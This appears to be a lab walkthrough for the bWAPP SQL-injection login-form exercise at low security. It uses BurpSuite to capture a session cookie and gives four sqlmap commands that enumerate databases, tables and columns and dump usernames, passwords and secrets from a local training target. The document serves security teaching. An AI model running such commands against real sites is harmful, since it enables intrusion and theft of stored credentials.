SQL Injection Login Form User Low Security Level

SQL Injection (Login Form/User) - Low Security Level Solution: *Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured browser then please configure the browser with proxy and then follow the below steps. Step 1. Give ' as an input in Login text field, click on Login button and check the output. Step 2. Turn on the intercept. Give bee and bug as an input in Login and Password text field, click on Login button and check the request in BurpSuite. Note the Cookie and PHPSESSID details Cookie: security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2 Step 3. Lets create payloads - Follow steps as shown in the video: Syntax: sqlmap -u "YOUR URL" --cookie="security_level=0; PHPSESSID=YOUR SESSION ID" --data "login=bee&password=bug&form=submit" --dbs Payload 1: sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" --dbs With the same logic below Payloads are created. Payload 2: sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP --tables Payload 3: sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users --columns Payload 4: sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users -C login,password,secret --dump Step 4. Open command prompt, paste the newly created payload in the command window and check the results. PseudoTime